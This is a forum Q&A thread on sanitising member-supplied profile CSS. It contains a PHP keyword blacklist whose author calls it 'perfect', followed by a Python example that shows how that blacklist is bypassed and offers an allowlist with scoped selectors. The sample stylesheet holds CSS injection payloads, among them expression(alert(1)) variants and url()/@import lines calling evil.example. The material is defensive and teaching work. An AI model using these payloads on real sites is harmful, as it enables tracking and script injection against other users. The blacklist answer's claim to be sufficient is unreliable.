How do I ensure user input is CSS and not malicious code?

Backend · unresolved · 3 answers · 1231
自闭症患者 2021-01-18 01:54

On my website I want to include a text box that will allow the members to change anything they want CSS-wise on their profiles....but I don't want to wake up one morning to

3 answers
  •  囚心锁ツ
    2021-01-18 02:42

    I guess this should be enough:

    <?php
    // Take the raw CSS from the form and remove any HTML tags.
    $style = strip_tags($_POST['style'] ?? '');

    // Substrings that let CSS run script in old browsers (IE expression(),
    // behavior:, Mozilla -moz-binding) or smuggle a script URL.
    $forbiddenStuff = array(
        '-moz-binding',
        'expression',
        'javascript:',
        'behavior:',   // the IE property is spelt "behavior"; keep both spellings
        'behaviour:',
        'vbscript:',
        'mocha:',
        'livescript:',
    );

    // Remove the forbidden substrings case-insensitively, repeating until
    // nothing changes, so a term split by another copy of itself
    // (e.g. "expressexpressionion") cannot reassemble after a single pass.
    do {
        $before = $style;
        $style  = str_ireplace($forbiddenStuff, '', $style);
    } while ($style !== $before);

    Store `$style` in the DB and render it on the user profile.

    Please note that this solution is copied from well-known software which has a big community, so I hope this should be perfect.
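As an added example (not part of the answer above nor of the software it cites), the following Python script shows two things a practitioner would want to check before shipping a substring blacklist for user CSS: first, how the blacklist approach is bypassed by nested keywords, CSS hex escapes and at-rules it never lists; second, an allowlist alternative that keeps only known properties with well-formed values and prefixes every selector with the profile's container so a member cannot restyle the rest of the page. Python is used instead of PHP so the example runs stand-alone; the property table, value patterns, the scope class `.profile-42` and the sample stylesheet `USER_CSS` are all constructed for this example.

```python
import re

# --- 1. The blacklist approach from the answer, ported to Python ---------------
FORBIDDEN = ["-moz-binding", "expression", "javascript:", "behaviour:",
             "behavior:", "vbscript:", "mocha:", "livescript:"]


def blacklist_filter(style: str) -> str:
    """Delete each forbidden substring in one case-insensitive pass, the way a
    single str_ireplace() call does. Kept deliberately naive to show the gaps."""
    style = re.sub(r"<[^>]*>", "", style)  # crude stand-in for strip_tags()
    for term in FORBIDDEN:
        style = re.sub(re.escape(term), "", style, flags=re.IGNORECASE)
    return style


# --- 2. An allowlist: keep only known properties with well-formed values -------
# Hypothetical property set for a profile theme; extend with the same rigour.
COLOR = (r"(#[0-9a-fA-F]{3,8}|[a-zA-Z]{3,20}"                      # #hex or keyword
         r"|rgba?\(\s*\d{1,3}(\s*,\s*\d{1,3}){2}(\s*,\s*(0|1|0?\.\d+))?\s*\))")
LENGTH = r"(0|-?\d+(\.\d+)?(px|em|rem|%|pt))"
ALLOWED_PROPERTIES = {
    "color": COLOR,
    "background-color": COLOR,
    "border-color": COLOR,
    "font-size": LENGTH,
    "font-weight": r"(normal|bold|[1-9]00)",
    "font-family": r"[a-zA-Z][a-zA-Z ,-]*",        # unquoted family names only
    "text-align": r"(left|right|center|justify)",
    "text-decoration": r"(none|underline|line-through)",
    "margin": rf"{LENGTH}(\s+{LENGTH}){{0,3}}",
    "padding": rf"{LENGTH}(\s+{LENGTH}){{0,3}}",
    "border-radius": LENGTH,
}
# Selectors may use only element/class/id/pseudo-class syntax:
# no '@', '(', '[', '\' or quotes, so at-rules and url() can never appear here.
SELECTOR_RE = re.compile(r"[a-zA-Z0-9_.#:>\s-]+")
RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}")


def sanitize_css(style: str, scope: str) -> str:
    """Return CSS containing only allowlisted declarations, with every selector
    prefixed by `scope` (e.g. ".profile-42") so the theme is confined to the
    member's own profile container. Anything unrecognised is dropped, never
    'cleaned', so escapes such as \\65xpression cannot slip through."""
    style = re.sub(r"/\*.*?\*/", "", style, flags=re.DOTALL)  # drop comments
    style = re.sub(r"@[^{};]*;", "", style)  # drop block-less at-rules (@import, @charset)
    rules = []
    for selector_text, body in RULE_RE.findall(style):
        selectors = [s.strip() for s in selector_text.split(",")]
        if not all(s and SELECTOR_RE.fullmatch(s) for s in selectors):
            continue  # unknown selector syntax: reject the whole rule
        kept = []
        for decl in body.split(";"):
            if ":" not in decl:
                continue
            prop, value = (p.strip() for p in decl.split(":", 1))
            pattern = ALLOWED_PROPERTIES.get(prop.lower())
            # fullmatch: the whole value must fit the pattern, so "red !important",
            # "url(...)" and "expression(...)" are all rejected outright.
            if pattern and re.fullmatch(pattern, value, flags=re.IGNORECASE):
                kept.append(f"{prop.lower()}: {value}")
        if kept:
            scoped = ", ".join(f"{scope} {s}" for s in selectors)
            rules.append(f"{scoped} {{ {'; '.join(kept)}; }}")
    return "\n".join(rules)


# Constructed sample: one honest rule per line mixed with the usual tricks.
USER_CSS = r"""
.bio { color: #336699; font-size: 14px; }
body { color: red !important; display: none; }
.bio { background: url(http://evil.example/track.png); width: expressexpressionion(alert(1)); }
@import url(http://evil.example/steal.css);
.avatar { border-radius: 50%; color: \65xpression(alert(1)); }
"""

if __name__ == "__main__":
    # The blacklist reassembles the keyword it just removed and is blind to
    # the hex escape and to @import, which it never listed.
    print(blacklist_filter("width: expressexpressionion(alert(1))"))
    print(blacklist_filter(r"color: \65xpression(alert(1))"))
    print(blacklist_filter("@import url(http://evil.example/steal.css);"))
    print(sanitize_css(USER_CSS, ".profile-42"))
```

Scoping the selectors matters even for harmless properties: without the prefix, `body { display: none; }` or a rule on the site's login form would let one member deface pages for everyone who views the profile. The allowlist still needs a Content-Security-Policy `style-src` that does not include `'unsafe-inline'` for anything outside the sanitised block, and a review whenever a new property is added to `ALLOWED_PROPERTIES`.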
